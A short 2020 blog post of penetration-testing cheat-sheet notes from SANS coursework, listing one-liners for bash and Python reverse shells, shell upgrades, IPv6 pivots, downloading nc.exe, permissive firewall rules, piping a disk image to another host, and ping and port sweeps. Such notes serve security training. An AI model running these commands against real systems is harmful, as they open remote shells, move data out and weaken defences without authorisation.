07 Jan 2020

Cleaning House - SANS Pen test

We’re moving house, so the old SANS Pentesing posters and notes are headed for the recycle bin :(

I wouldn’t bother reading this post if i was you. Visit SANS.org or Google for “SANS posters”. They’re much better than anything here. Or, better still, do SANS 660.

Bash Notes

Pivot across the network via IPv6. Allow your IPv4 tools to work with IPv6.

sudo socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::6bb8:6aaa:fe40:9864]:80


nikto -host -port 8080

Whats my IP on this machine? curl -4 icanhazip.com or dig +short myip.opendns.com @resolver1.opendns.com or wget -qO- ifconfig.me/ip

Compress a partition and SSH it elsewhere

dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C me@ "cat >/tmpimage.dd"

The bash reverse shell bash -i >& /dev/tcp/ 0>&1

Encode echo "test" | base64 and Decode echo "dGVzdAo=" | base64 -d

Quick website clone wget -r -nH $URL


Upgrade your raw shell python -c 'import pty; pty.spawn("/bin/bash")'

Python reverse Shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python 2 web server python -m SimpleHTTPServer 8888, Python 3 python -m http.server 8888

Python web client

python3 -c 'import urllib.request; urllib.request.urlretrieve("","/tmp/thething.html")'

Debug python -m pdb exploit.py


Turn a windows box into a wireless access point

netsh wlan set hostednetwork mode=allow ssid=nothingsketchy key=mypass && netsh wlan start hostednetwork

Build an IPv6 pivot

netsh interface portproxy add v4tov6 listenport=8080 listenaddress= connectport=<RPort> connectaddress=<RHost>

Keep an eye on network connections to the machine netstat -naob 1 | find "<ip or port>"

Process list: wmic process list full

Tasks and Services: tasklist /svc


Ping all the things

1..255 | % { echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | select-string ttl}

The PS Web Client

(cheeky way since Windows 8) wget "" -outfile "c:\temp\nc.exe"

But you should probably also know: (New-Object System.Net.WebClient).DownloadFile("", "c:\temp\nc.exe")

Check Firewall Rules: get-NetFirewallRule -all or get-netfirewallrule -all | export-csv "mycsv.csv"

Modify Firewall Rules: New-NetFirewallRule -action Allow -displayname LegitException -remoteAddress

Scan: 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).connect("<IP>",$_)) "Port $_ is open"} 2>$null


Chad Duffey

Security Engineer